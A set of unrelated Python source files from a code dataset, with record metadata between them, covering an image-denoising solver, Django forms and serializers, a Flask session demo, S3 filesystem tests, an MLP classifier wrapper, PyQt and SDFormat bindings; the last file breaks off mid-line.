|nabla u | + 1/(2*theta)*(u-v), with v an image of fiwed size\n# tha main purpose of this code is code of the library\n\nclass ROFSolver(object):\n\t\"\"\"algorithm that resolves: argmin int_{u} |nabla u | + 1/(2*theta)*(u-v) \"\"\"\n\tdef __init__(self, v,theta,uInit=None):\n\t\tself.v = v\n\t\tself.theta = theta\n\t\tself.uInit = uInit.copy()\n\t\tself.compute()\n\tdef compute(self):\n\t\tlbda = 1.0/(self.theta)\n\t\t# self.u = skimage.restoration.denoise_tv_chambolle(self.v,weight= weight,eps=10**(-30),n_iter_max=5000)\n\t\tself.primalDualAlgo = acceleratedPrimalDual.PrimalDualAccelerated(self.v,lbda,self.uInit)\n\t\tself.u = self.primalDualAlgo.uc\n\tdef computeCost(self,u):\n\t\treturn self.primalDualAlgo.computeCostPrimal(u)\n\n\tdef computeCostForSolution(self):\n\t\treturn self.primalDualAlgo.computeCostPrimalCurrent()\n\t\t\n\n\nclass testROFFromScipy(object):\n\t\"\"\"docstring for testROFFromScipy\"\"\"\n\tdef __init__(self,v,theta,uInit):\n\t\tself.GradModule = gradModule.GradModule()\n\t\tself.v = v\n\t\tself.theta = theta\n\t\tself.uInit = uInit\n\tdef applyAlgotihm(self):\n\t\tself.rofSolver = ROFSolver(self.v,self.theta,self.uInit)\n\t\tself.uOptimal = self.rofSolver.u \n\t\tself.minCost = self.computeCost(self.uOptimal)\n\n\tdef computeCost(self,u):\n\t\treturn self.rofSolver.computeCost(u)\n\tdef testUnitary(self,u):\n\t\tcost = self.computeCost(u)\n\t\ttmp = (cost,self.minCost,cost>=self.minCost)\n\t\tprint(tmp)\n\t\treturn tmp\n\n\tdef testmultiple(self,err=10**(-14),nbTest=10000):\n\t\tfor i in range(nbTest):\n\t\t\tu =self.uOptimal + (np.random.rand(*self.uOptimal.shape)-0.5)*err\n\t\t\ttmp = self.testUnitary(u)\n\t\t\tif(tmp[2]==False):\n\t\t\t\tbreak;\n\n\nif __name__ == '__main__':\n\t# v = cv2.imread(\"./2009_09_08_drive_0010/I1_000000.png\")[...,0].astype(\"float32\")/255\n\t# uInit = np.zeros(v.shape)\n\tv = np.load(\"v.npy\")\n\tuInit = np.load(\"uInit.npy\")\n\ttheta = np.load(\"theta.npy\")\n\talgo = testROFFromScipy(v,theta,uInit)\n\talgo.applyAlgotihm()\n\talgo.uOptimal = algo.uInit\n\talgo.minCost = algo.computeCost(algo.uOptimal)\n\talgo.testmultiple()","sub_path":"rofSolver/rofSolver.py","file_name":"rofSolver.py","file_ext":"py","file_size_in_byte":2173,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"11279576","text":"from rest_framework import serializers\r\nfrom .models import Account, Transaction\r\nfrom .fields import CurrencyField\r\n\r\n\r\nclass AccountSerializer(serializers.ModelSerializer):\r\n balance = serializers.DecimalField(125, 2, read_only=True, label=\"Balance\")\r\n class Meta:\r\n model = Account\r\n fields = (\r\n 'id',\r\n 'name',\r\n 'balance',\r\n )\r\n read_only_fields = (\r\n 'balance',\r\n )\r\n\r\n\r\n\r\nclass TransactionSerializer(serializers.ModelSerializer):\r\n debit_account = AccountSerializer()\r\n credit_account = AccountSerializer()\r\n name = serializers.CharField(source=\"description\", read_only=True, label=\"Name\")\r\n class Meta:\r\n model = Transaction\r\n fields = (\r\n 'id',\r\n 'name',\r\n 'date',\r\n 'debit_account',\r\n 'credit_account',\r\n 'description',\r\n 'amount',\r\n )\r\n hidden_fields = (\r\n 'name'\r\n )\r\n read_only_fields = (\r\n 'name',\r\n )\r\n","sub_path":"serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":1063,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"236788149","text":"from flask import Flask, session\napp = Flask(__name__)\n# Add these extra two lines\napp.secret_key = 's3cr3t'\napp.config['SESSION_TYPE'] = 'filesystem'\n\n@app.route('/')\ndef count(x):\n # See if we already instantiated the list\n s = session.get('sum', None)\n if not s:\n # If it's not there, add our first item.\n session['sum'] = x\n else:\n # If it's there, add the current number\n session['sum']+=x\n # Display current count\n return str(session['sum'])\n\n\n@app.route('/')\ndef home():\n return 'Open this page and go to /5 or some other number'\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0')\n","sub_path":".ipynb_checkpoints/sessions-checkpoint.py","file_name":"sessions-checkpoint.py","file_ext":"py","file_size_in_byte":653,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"356009191","text":"import json\nimport os\n\n\ndef readMainConfig():\n\tpath = os.path.join(os.getcwd(), \"config.json\")\n\twith open(path, 'r') as f:\n\t\tdata = f.read()\n\treturn json.loads(data)\n\n\ndef getNodeConfig():\n\tpath = os.path.join(os.getcwd(), \"hostConfig.json\")\n\twith open(path, 'r') as f:\n\t\tdata = f.read()\n\treturn json.loads(data)\n\ndef getKeys():\n\tpath = os.path.join(os.getcwd(), \"fixtures\", \"prKeys.json\")\n\twith open(path, 'r') as f:\n\t\tdata = f.read()\n\treturn json.loads(data)\n\ndef readFixtures(type):\n\tpath = \"\"\n\tif type == \"contracts\":\n\t\tpath = os.path.join(os.getcwd(), \"fixtures\", \"contracts.json\")\n\tif type == \"pages\":\n\t\tpath = os.path.join(os.getcwd(), \"fixtures\", \"pages.json\")\n\twith open(path, 'r', encoding='UTF-8') as f:\n\t\tdata = f.read()\n\treturn json.loads(data)\n","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":758,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"317668102","text":"# -*- coding: utf-8 -*-\nimport pytest\nfrom distributed.s3fs import S3FileSystem\nfrom distributed.s3 import seek_delimiter\nfrom distributed.utils_test import slow\nfrom distributed.utils import ignoring\n\nfrom botocore.exceptions import NoCredentialsError\n\n# These get mirrored on s3://distributed-test/\ntest_bucket_name = 'distributed-test'\nfiles = {'test/accounts.1.json': (b'{\"amount\": 100, \"name\": \"Alice\"}\\n'\n b'{\"amount\": 200, \"name\": \"Bob\"}\\n'\n b'{\"amount\": 300, \"name\": \"Charlie\"}\\n'\n b'{\"amount\": 400, \"name\": \"Dennis\"}\\n'),\n 'test/accounts.2.json': (b'{\"amount\": 500, \"name\": \"Alice\"}\\n'\n b'{\"amount\": 600, \"name\": \"Bob\"}\\n'\n b'{\"amount\": 700, \"name\": \"Charlie\"}\\n'\n b'{\"amount\": 800, \"name\": \"Dennis\"}\\n')}\n\ncsv_files = {'2014-01-01.csv': (b'name,amount,id\\n'\n b'Alice,100,1\\n'\n b'Bob,200,2\\n'\n b'Charlie,300,3\\n'),\n '2014-01-02.csv': (b'name,amount,id\\n'),\n '2014-01-03.csv': (b'name,amount,id\\n'\n b'Dennis,400,4\\n'\n b'Edith,500,5\\n'\n b'Frank,600,6\\n')}\n\n@pytest.yield_fixture\ndef s3():\n # could do with a bucket with write privileges.\n yield S3FileSystem(anon=True)\n\n\ndef test_non_anonymous_access():\n with ignoring(NoCredentialsError):\n fs = S3FileSystem(anon=False)\n fs.ls('distributed-test')\n\n\ndef test_s3_file_access(s3):\n fn = 'distributed-test/nested/file1'\n data = b'hello\\n'\n assert s3.cat(fn) == data\n assert s3.head(fn, 3) == data[:3]\n assert s3.tail(fn, 3) == data[-3:]\n assert s3.tail(fn, 10000) == data\n\n\ndef test_s3_file_info(s3):\n fn = 'distributed-test/nested/file1'\n data = b'hello\\n'\n assert fn in s3.walk('distributed-test')\n assert s3.exists(fn)\n assert not s3.exists(fn+'another')\n assert s3.info(fn)['Size'] == len(data)\n with pytest.raises((OSError, IOError)):\n s3.info(fn+'another')\n\n\ndef test_du(s3):\n d = s3.du(test_bucket_name, deep=True)\n assert all(isinstance(v, int) and v >= 0 for v in d.values())\n assert 'distributed-test/nested/file1' in d\n\n assert s3.du(test_bucket_name + '/test/', total=True) ==\\\n sum(map(len, files.values()))\n\n\ndef test_s3_ls(s3):\n fn = 'distributed-test/nested/file1'\n assert fn not in s3.ls('distributed-test/')\n assert fn in s3.ls('distributed-test/nested/')\n assert fn in s3.ls('distributed-test/nested')\n assert s3.ls('s3://distributed-test/nested/') == s3.ls('distributed-test/nested')\n\n\ndef test_s3_ls_detail(s3):\n L = s3.ls('distributed-test/nested', detail=True)\n assert all(isinstance(item, dict) for item in L)\n\n\ndef test_s3_glob(s3):\n fn = 'distributed-test/nested/file1'\n assert fn not in s3.glob('distributed-test/')\n assert fn not in s3.glob('distributed-test/*')\n assert fn in s3.glob('distributed-test/nested')\n assert fn in s3.glob('distributed-test/nested/*')\n assert fn in s3.glob('distributed-test/nested/file*')\n assert fn in s3.glob('distributed-test/*/*')\n\n\ndef test_get_list_of_summary_objects(s3):\n L = s3.ls(test_bucket_name + '/test')\n\n assert len(L) == 2\n assert [l.lstrip(test_bucket_name).lstrip('/') for l in sorted(L)] == sorted(list(files))\n\n L2 = s3.ls('s3://' + test_bucket_name + '/test')\n\n assert L == L2\n\n\ndef test_read_keys_from_bucket(s3):\n for k, data in files.items():\n file_contents = s3.cat('/'.join([test_bucket_name, k]))\n assert file_contents == data\n\n assert (s3.cat('/'.join([test_bucket_name, k])) ==\n s3.cat('s3://' + '/'.join([test_bucket_name, k])))\n\n\n@slow\ndef test_seek_delimiter(s3):\n fn = 'test/accounts.1.json'\n data = files[fn]\n with s3.open('/'.join([test_bucket_name, fn])) as f:\n seek_delimiter(f, b'}', 0)\n assert f.tell() == 0\n f.seek(1)\n seek_delimiter(f, b'}', 5)\n assert f.tell() == data.index(b'}') + 1\n seek_delimiter(f, b'\\n', 5)\n assert f.tell() == data.index(b'\\n') + 1\n f.seek(1, 1)\n ind = data.index(b'\\n') + data[data.index(b'\\n')+1:].index(b'\\n') + 1\n seek_delimiter(f, b'\\n', 5)\n assert f.tell() == ind + 1\n\n\ndef test_read_s3_block(s3):\n import io\n data = files['test/accounts.1.json']\n lines = io.BytesIO(data).readlines()\n path = 'distributed-test/test/accounts.1.json'\n assert s3.read_block(path, 1, 35, b'\\n') == lines[1]\n assert s3.read_block(path, 0, 30, b'\\n') == lines[0]\n assert s3.read_block(path, 0, 35, b'\\n') == lines[0] + lines[1]\n assert s3.read_block(path, 0, 5000, b'\\n') == data\n assert len(s3.read_block(path, 0, 5)) == 5\n assert len(s3.read_block(path, 4, 5000)) == len(data) - 4\n assert s3.read_block(path, 5000, 5010) == b''\n\n assert s3.read_block(path, 5, None) == s3.read_block(path, 5, 1000)\n","sub_path":"distributed/tests/test_s3fs.py","file_name":"test_s3fs.py","file_ext":"py","file_size_in_byte":5086,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"47410394","text":"import matplotlib.pyplot as plt\nimport numpy as np\nfrom sklearn.neural_network import MLPClassifier\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.datasets import make_classification\nfrom sklearn.model_selection import train_test_split\n\n\nclass NN_Classifier():\n\ttrained = False\n\n\tdef __init__(self):\n\t\tself.mlp_predictor = MLPClassifier()\n\n\tdef train(self, X_train, y_train):\n\t\tself.scaler = StandardScaler()\n\t\tself.scaler.fit(X_train)\n\t\tX_train = self.scaler.transform(X_train)\n\t\tself.mlp_predictor.fit(X_train, y_train)\n\t\tself.trained = True\n\t\t# return train accuracy\n\t\treturn self.mlp_predictor.score(X_train, y_train)\n\n\tdef predict(self, X_test):\n\t\tassert self.trained, \"You should call train first.\"\n\t\tX_test = self.scaler.transform(X_test)\n\t\treturn self.mlp_predictor.predict(X_test)\n\n\tdef plot(self, X_train, y_train, X_test, y_test):\n\t\talphas = np.logspace(-6, 3, 10)\n\t\taccuracy = []\n\n\t\tfor i in alphas:\n\t\t\tclassifier = MLPClassifier(alpha=i, max_iter=300)\n\t\t\tscaler = StandardScaler()\n\t\t\tscaler.fit(X_train)\n\t\t\tX_train = scaler.transform(X_train)\n\t\t\tclassifier.fit(X_train, y_train)\n\t\t\tX_test = scaler.transform(X_test)\n\t\t\taccuracy.append(classifier.score(X_test, y_test))\n\n\t\tplt.plot(np.log10(alphas), accuracy)\n\t\tplt.xlabel(\"alpha in log10\")\n\t\tplt.ylabel(\"accuracy\")\n\t\tplt.title(\"regularization comparison in neural_network\")\n\t\tplt.savefig(\"neural_network_analysis.png\")\n\t\tplt.show()\n\n\n","sub_path":"nureral_network.py","file_name":"nureral_network.py","file_ext":"py","file_size_in_byte":1412,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"537655755","text":"import sys\nimport os\nfrom PyQt5.QtWidgets import *\nfrom PyQt5 import uic\n\n\nfolder_path = os.path.dirname(os.path.abspath(__file__))\n\nform_class = uic.loadUiType(os.path.join(folder_path,\"lineEdit.ui\"))[0]\n\n#화면을 띄우는데 사용되는 Class 선언\nclass WindowClass(QMainWindow, form_class) :\n def __init__(self):\n super().__init__()\n self.setupUi(self)\n\n self.pb_2.clicked.connect(self.btn_2_clicked)\n self.pb_1.clicked.connect(self.btn_1_clicked)\n\n self.lineE_1.textChanged.connect(self.line_E_textChanged)\n self.lineE_1.returnPressed.connect(self.lineE_1_returnPressed)\n\n # self.g_pb_1.clicked.connect(self.g_pb_1_clicked)\n # self.g_pb_2.clicked.connect(self.g_pb_2_clicked)\n # self.g_pb_3.clicked.connect(self.g_pb_3_clicked)\n # self.g_pb_4.clicked.connect(self.g_pb_4_clicked)\n\n\n def btn_1_clicked(self):\n self.lineE_1.setText(\"change Text\")\n\n def btn_2_clicked(self):\n self.lb_1.setText(\"change text\")\n\n def line_E_textChanged(self):\n self.lb_1.setText(self.lineE_1.text())\n\n def lineE_1_returnPressed(self):\n print(self.lineE_1.text())\n\n\n # def g_pb_1_clicked(self):\n # print(self.textB_1.toPlainText())\n\n # def g_pb_2_clicked(self):\n # self.textB_1.setPlainText(\"1st line\")\n\n # def g_pb_3_clicked(self):\n # self.textB_1.append(\"2nd Line\")\n\n # def g_pb_4_clicked(self):\n # self.textB_1.clear()\n \n\n \n\n\n\n\n\n\n \n\n\nif __name__ == \"__main__\" :\n app = QApplication(sys.argv) \n myWindow = WindowClass() \n myWindow.show()\n app.exec_()","sub_path":"py_designer_tutorial/4_line_Edit.py","file_name":"4_line_Edit.py","file_ext":"py","file_size_in_byte":1621,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"617531922","text":"from dataclasses import dataclass, field\nfrom typing import List, Optional\nfrom .model import Model\n\n__NAMESPACE__ = \"sdformat/v1.4/state.xsd\"\n\n\n@dataclass\nclass State:\n \"\"\"\n Parameters\n ----------\n sim_time: Simulation time stamp of the state [seconds nanoseconds]\n wall_time: Wall time stamp of the state [seconds nanoseconds]\n real_time: Real time stamp of the state [seconds nanoseconds]\n insertions: A list of new model names\n deletions: A list of deleted model names\n model: Model state\n world_name: Name of the world this state applies to\n \"\"\"\n\n class Meta:\n name = \"state\"\n\n sim_time: str = field(\n default=\"0 0\",\n metadata={\n \"type\": \"Element\",\n \"namespace\": \"\",\n \"required\": True,\n \"white_space\": \"collapse\",\n \"pattern\": r\"\\d+ \\d+\",\n },\n )\n wall_time: str = field(\n default=\"0 0\",\n metadata={\n \"type\": \"Element\",\n \"namespace\": \"\",\n \"required\": True,\n \"white_space\": \"collapse\",\n \"pattern\": r\"\\d+ \\d+\",\n },\n )\n real_time: str = field(\n default=\"0 0\",\n metadata={\n \"type\": \"Element\",\n \"namespace\": \"\",\n \"required\": True,\n \"white_space\": \"collapse\",\n \"pattern\": r\"\\d+ \\d+\",\n },\n )\n insertions: Optional[\"State.Insertions\"] = field(\n default=None,\n metadata={\n \"type\": \"Element\",\n \"namespace\": \"\",\n },\n )\n deletions: Optional[\"State.Deletions\"] = field(\n default=None,\n metadata={\n \"type\": \"Element\",\n \"namespace\": \"\",\n },\n )\n model: List[\"State.Model\"] = field(\n default_factory=list,\n metadata={\n \"type\": \"Element\",\n \"namespace\": \"\",\n },\n )\n world_name: Optional[str] = field(\n default=None,\n metadata={\n \"type\": \"Attribute\",\n \"required\": True,\n },\n )\n\n @dataclass\n class Insertions:\n \"\"\"\n A list of new model names.\n\n Parameters\n ----------\n model: The model element defines a complete robot or any other\n physical object.\n \"\"\"\n\n model: List[Model] = field(\n default_factory=list,\n metadata={\n \"type\": \"Element\",\n \"namespace\": \"\",\n },\n )\n\n @dataclass\n class Deletions:\n \"\"\"\n A list of deleted model names.\n\n Parameters\n ----------\n name: The name of a deleted model\n \"\"\"\n\n name: List[str] = field(\n default_factory=list,\n metadata={\n \"type\": \"Element\",\n \"namespace\": \"\",\n \"min_occurs\": 1,\n },\n )\n\n @dataclass\n class Model:\n \"\"\"\n Model state.\n\n Parameters\n ----------\n pose: Pose of the model\n joint: Joint angle\n link: Link state\n name: Name of the model\n \"\"\"\n\n pose: str = field(\n default=\"0 0 0 0 0 0\",\n metadata={\n \"type\": \"Element\",\n \"namespace\": \"\",\n \"required\": True,\n \"pattern\": r\"(\\s*(-|\\+)?(\\d+(\\.\\d*)?|\\.\\d+|\\d+\\.\\d+[eE][-\\+]?[0-9]+)\\s+){5}((-|\\+)?(\\d+(\\.\\d*)?|\\.\\d+|\\d+\\.\\d+[eE][-\\+]?[0-9]+))\\s*\",\n },\n )\n joint: List[\"State.Model.Joint\"] = field(\n default_factory=list,\n metadata={\n \"type\": \"Element\",\n \"namespace\": \"\",\n },\n )\n link: List[\"State.Model.Link\"] = field(\n default_factory=list,\n metadata={\n \"type\": \"Element\",\n \"namespace\": \"\",\n },\n )\n name: Optional[str] = field(\n default=None,\n metadata={\n \"type\": \"Attribute\",\n \"required\": True,\n },\n )\n\n @dataclass\n class Joint:\n \"\"\"\n Joint angle.\n\n Parameters\n ----------\n angle: Angle of an axis\n name: Name of the joint\n \"\"\"\n\n angle: List[\"State.Model.Joint.Angle\"] = field(\n default_factory=list,\n metadata={\n \"type\": \"Element\",\n \"namespace\": \"\",\n \"min_occurs\": 1,\n },\n )\n name: Optional[str] = field(\n default=None,\n metadata={\n \"type\": \"Attribute\",\n \"required\": True,\n },\n )\n\n @dataclass\n class Angle:\n \"\"\"\n Parameters\n ----------\n value:\n axis: Index of the axis.\n \"\"\"\n\n value: Optional[float] = field(\n default=None,\n metadata={\n \"required\": True,\n },\n )\n axis: Optional[int] = field(\n default=None,\n metadata={\n \"type\": \"Attribute\",\n \"required\": True,\n },\n )\n\n @dataclass\n class Link:\n \"\"\"\n Link state.\n\n Parameters\n ----------\n pose: Pose of the link relative to the model\n velocity: Velocity of the link\n acceleration: Acceleration of the link\n wrench: Force applied to the link\n collision: Collision state\n name: Name of the link\n \"\"\"\n\n pose: str = field(\n default=\"0 0 0 0 0 0\",\n metadata={\n \"type\": \"Element\",\n \"namespace\": \"\",\n \"required\": True,\n \"pattern\": r\"(\\s*(-|\\+)?(\\d+(\\.\\d*)?|\\.\\d+|\\d+\\.\\d+[eE][-\\+]?[0-9]+)\\s+){5}((-|\\+)?(\\d+(\\.\\d*)?|\\.\\d+|\\d+\\.\\d+[eE][-\\+]?[0-9]+))\\s*\",\n },\n )\n velocity: str = field(\n default=\"0 0 0 0 0 0\",\n metadata={\n \"type\": \"Element\",\n \"namespace\": \"\",\n \"required\": True,\n \"pattern\": r\"(\\s*(-|\\+)?(\\d+(\\.\\d*)?|\\.\\d+|\\d+\\.\\d+[eE][-\\+]?[0-9]+)\\s+){5}((-|\\+)?(\\d+(\\.\\d*)?|\\.\\d+|\\d+\\.\\d+[eE][-\\+]?[0-9]+))\\s*\",\n },\n )\n acceleration: str = field(\n default=\"0 0 0 0 0 0\",\n metadata={\n \"type\": \"Element\",\n \"namespace\": \"\",\n \"required\": True,\n \"pattern\": r\"(\\s*(-|\\+)?(\\d+(\\.\\d*)?|\\.\\d+|\\d+\\.\\d+[eE][-\\+]?[0-9]+)\\s+){5}((-|\\+)?(\\d+(\\.\\d*)?|\\.\\d+|\\d+\\.\\d+[eE][-\\+]?[0-9]+))\\s*\",\n },\n )\n wrench: str = field(\n default=\"0 0 0 0 0 0\",\n metadata={\n \"type\": \"Element\",\n \"namespace\": \"\",\n \"required\": True,\n \"pattern\": r\"(\\s*(-|\\+)?(\\d+(\\.\\d*)?|\\.\\d+|\\d+\\.\\d+[eE][-\\+]?[0-9]+)\\s+){5}((-|\\+)?(\\d+(\\.\\d*)?|\\.\\d+|\\d+\\.\\d+[eE][-\\+]?[0-9]+))\\s*\",\n },\n )\n collision: List[\"State.Model.Link.Collision\"] = field(\n default_factory=list,\n metadata={\n \"type\": \"Element\",\n \"namespace\": \"\",\n },\n )\n name: Optional[str] = field(\n default=None,\n metadata={\n \"type\": \"Attribute\",\n \"required\": True,\n },\n )\n\n @dataclass\n class Collision:\n \"\"\"\n Collision state.\n\n Parameters\n ----------\n pose: Pose of the link relative to the model\n name: Name of the collision\n \"\"\"\n\n pose: str = field(\n default=\"0 0 0 0 0 0\",\n metadata={\n \"type\": \"Element\",\n \"namespace\": \"\",\n \"required\": True,\n \"pattern\": r\"(\\s*(-|\\+)?(\\d+(\\.\\d*)?|\\.\\d+|\\d+\\.\\d+[eE][-\\+]?[0-9]+)\\s+){5}((-|\\+)?(\\d+(\\.\\d*)?|\\.\\d+|\\d+\\.\\d+[eE][-\\+]?[0-9]+))\\s*\",\n },\n )\n name: Optional[str] = field(\n default=None,\n metadata={\n \"type\": \"Attribute\",\n \"required\": True,\n },\n )\n","sub_path":"skbot/ignition/sdformat/bindings/v14/state.py","file_name":"state.py","file_ext":"py","file_size_in_byte":8814,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"119854747","text":"#!/usr/bin/env python2\n\nfrom __future__ import print_function\n\nimport os\nimport random\nimport sys\n\nMAX_LEN = 9\nALPHABET='0123456789abcdefghijklmnopqrstuvwxyz'\nLEN_ALPHA=len(ALPHABET)\n\nurandom = random.SystemRandom()\nrnum = urandom.randint(0, LEN_ALPHA**MAX_LEN-1)\n\ndef base62(a):\n\tbaseit = (\n\t\tlambda a=a, b=LEN_ALPHA: (not a) and '0' or\n\t\tbaseit(a-a%b, b*LEN_ALPHA) + ALPHABET[a%b%(LEN_ALPHA-1) or -1*bool(a%b)]\n\t)\n\treturn baseit()\n\n#http://stackoverflow.com/a/36875787\n\nresult = base62(rnum).lstrip('0').zfill(MAX_LEN)\n\nif len(sys.argv) == 2:\n\tprint(result, end='')\nelse:\n\tprint(result)\n","sub_path":"asciidoc/bin/story-id.py","file_name":"story-id.py","file_ext":"py","file_size_in_byte":589,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"173297305","text":"import datetime\n\nfrom django import forms\nfrom django.utils.translation import ugettext_lazy as _\n\nfrom records.models import Record\nfrom tagging.models import Tag\nfrom tinymce.widgets import TinyMCE\nfrom groups.forms import GroupAssociationRequestRelatedForm\nfrom groups.models import Group\n\nfrom models import Action, UserActionProgress, GroupActionProgress\n\nclass BaseActionForm(forms.Form):\n def __init__(self, user, action, *args, **kwargs):\n super(BaseActionForm, self).__init__(*args, **kwargs)\n self.user = user\n self.action = action\n\nclass ActionCommitForm(BaseActionForm):\n date_committed = forms.DateField(\n label=_(\"Commit date\"),\n widget=forms.DateInput(format=\"%Y-%m-%d\", \n attrs={\"class\": \"date_commit_field\"}))\n\n def __init__(self, *args, **kwargs):\n super(ActionCommitForm, self).__init__(*args, **kwargs)\n if not self.user or self.user.is_anonymous() or not self.action:\n self.fields[\"date_committed\"].initial = (datetime.date.today() + \n datetime.timedelta(days=1))\n return\n try:\n uap = UserActionProgress.objects.get(user=self.user, action=self.action)\n except UserActionProgress.DoesNotExist:\n uap = None\n if uap and uap.date_committed:\n self.fields[\"date_committed\"].initial = uap.date_committed\n else:\n self.fields[\"date_committed\"].initial = (datetime.date.today() + \n datetime.timedelta(days=1))\n\n def save(self):\n return self.action.commit_for_user(\n self.user, self.cleaned_data[\"date_committed\"])\n\nclass GroupActionCommitForm(BaseActionForm):\n date_committed = forms.DateField(\n label=_(\"Commit date\"),\n widget=forms.DateInput(format=\"%Y-%m-%d\", \n attrs={\"class\": \"date_commit_field\"}))\n group = forms.CharField(widget=forms.HiddenInput, required=True)\n\n def __init__(self, *args, **kwargs):\n group = kwargs.pop(\"group\", None)\n self.mark_completed = kwargs.pop(\"mark_completed\", False)\n self.mark_cancelled = kwargs.pop(\"mark_cancelled\", False)\n self.mark_undone = kwargs.pop(\"mark_undone\", False)\n\n super(GroupActionCommitForm, self).__init__(*args, **kwargs)\n\n if not group:\n group = self.data.get(\"group\")\n if group:\n group = Group.objects.get(slug=group)\n\n self.group_obj = group\n self.fields[\"group\"].initial = group.slug if group else ''\n if (not self.user or self.user.is_anonymous() \n or not self.action\n or not self.group_obj):\n self.fields[\"date_committed\"].initial = (datetime.date.today() + \n datetime.timedelta(days=1))\n return\n try:\n gap = GroupActionProgress.objects.get(group=self.group_obj, action=self.action)\n except GroupActionProgress.DoesNotExist:\n gap = None\n if gap and gap.date_committed:\n self.fields[\"date_committed\"].initial = gap.date_committed\n else:\n self.fields[\"date_committed\"].initial = (datetime.date.today() + \n datetime.timedelta(days=1))\n if self.mark_completed or self.mark_cancelled or self.mark_undone:\n self.fields[\"date_committed\"].required = False\n\n def clean_group(self):\n group = self.cleaned_data.get(\"group\")\n if not group:\n return\n try:\n group = Group.objects.get(slug=group)\n except Group.DoesNotExist:\n raise forms.ValidationError(_(\"The specific group does not exist.\"))\n if self.user and self.user not in group.users.all():\n raise forms.ValidationError(_(\"You must be a member of the group.\"))\n\n def save(self):\n ## Wow, what a mess. Need to stash the old set of groups\n # so that the link form's .groups attribute doesn't completely\n # overwrite it. But also, we need to make sure to execute\n # the old-group-set-stashing query before any data is written,\n # or else we'd lose it anyway because of lazy SQL evaluation.\n previous_groups = list(self.action.groups.all())\n link_form = ActionGroupLinkForm(self.user, instance=self.action,\n data={'groups': [self.group_obj.pk]})\n if not link_form.is_valid():\n return \n action = link_form.save()\n for previous_group in previous_groups:\n action.groups.add(previous_group)\n action.save()\n\n #if self.group_obj in link_form.cleaned_data[\"groups\"]:\n if self.mark_completed:\n return self.action.complete_for_group(self.group_obj)\n else:\n return self.action.commit_for_group(\n self.group_obj, self.cleaned_data[\"date_committed\"])\n\nclass ActionAdminForm(forms.ModelForm):\n tags = forms.ModelMultipleChoiceField(queryset=Tag.objects.all(),\n widget=forms.CheckboxSelectMultiple,\n required=False)\n content = forms.CharField(widget=TinyMCE(attrs={'cols': 80, 'rows': 30}))\n\n def __init__(self, *args, **kwargs):\n super(ActionAdminForm, self).__init__(*args, **kwargs)\n self.fields[\"tags\"].initial = [t.pk for t in self.instance.tags]\n\n class Meta:\n model = Action\n\n def save(self, *args, **kwargs):\n tags = self.cleaned_data[\"tags\"]\n self.instance.tags = \" \".join([t.name for t in tags]) if tags and self.instance.pk else \"\"\n return super(ActionAdminForm, self).save(*args, **kwargs)\n\nclass ActionGroupLinkForm(forms.ModelForm, GroupAssociationRequestRelatedForm):\n class Meta:\n model = Action\n fields = (\"groups\",)\n widgets = {\n \"groups\": forms.CheckboxSelectMultiple(),\n }\n\n def __init__(self, user, *args, **kwargs):\n super(ActionGroupLinkForm, self).__init__(*args, **kwargs)\n self.user = user\n self.init_groups(user)\n\n def save(self, *args, **kwargs):\n action = super(ActionGroupLinkForm, self).save(*args, **kwargs)\n self.save_groups(action)\n return action\n","sub_path":"actions/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":6396,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"327657013","text":"import sys\nfrom abc import ABC\nfrom enum import Enum\nfrom typing import Any, ClassVar, Dict, ForwardRef, Iterable, List, Optional, Set, Tuple, Union\n\nimport numpy as np\nfrom local_migrator import REGISTER, class_to_str, register_class, rename_key\nfrom pydantic import Field, validator\nfrom sympy import Symbol, symbols\n\nfrom PartSegCore.algorithm_describe_base import (\n AlgorithmDescribeBase,\n AlgorithmDescribeNotFound,\n base_model_to_algorithm_property,\n)\nfrom PartSegCore.universal_const import Units\nfrom PartSegCore.utils import BaseModel\nfrom PartSegImage import Channel\nfrom PartSegImage.image import Spacing\n\n\n@register_class(\n old_paths=[\n \"PartSeg.utils.analysis.statistics_calculation.PerComponent\",\n \"PartSeg.utils.analysis.measurement_base.PerComponent\",\n \"segmentation_analysis.statistics_calculation.PerComponent\",\n ]\n)\nclass PerComponent(Enum):\n \"\"\"How measurement should be calculated\"\"\"\n\n No = 1\n Yes = 2\n Mean = 3\n Per_Mask_component = 4\n\n def __str__(self):\n return self.name.replace(\"_\", \" \")\n\n\n@register_class(\n old_paths=[\n \"PartSeg.utils.analysis.statistics_calculation.AreaType\",\n \"PartSeg.utils.analysis.measurement_base.AreaType\",\n \"segmentation_analysis.statistics_calculation.AreaType\",\n ]\n)\nclass AreaType(Enum):\n \"\"\"On which area type measurement should be calculated\"\"\"\n\n ROI = 1\n Mask = 2\n Mask_without_ROI = 3\n\n def __str__(self):\n return self.name.replace(\"_\", \" \")\n\n\ndef has_mask_components(component_and_mask_info: Iterable[Tuple[PerComponent, AreaType]]) -> bool:\n \"\"\"Check if any measurement will return value per mask component\"\"\"\n return any(\n (cmp == PerComponent.Yes and area != AreaType.ROI) or cmp == PerComponent.Per_Mask_component\n for cmp, area in component_and_mask_info\n )\n\n\ndef has_roi_components(component_and_mask_info: Iterable[Tuple[PerComponent, AreaType]]) -> bool:\n \"\"\"Check if any measurement will return value per ROI component\"\"\"\n return any((cmp == PerComponent.Yes and area == AreaType.ROI) for cmp, area in component_and_mask_info)\n\n\ndef _migrate_leaf_dict(dkt):\n from PartSegCore.analysis.measurement_calculation 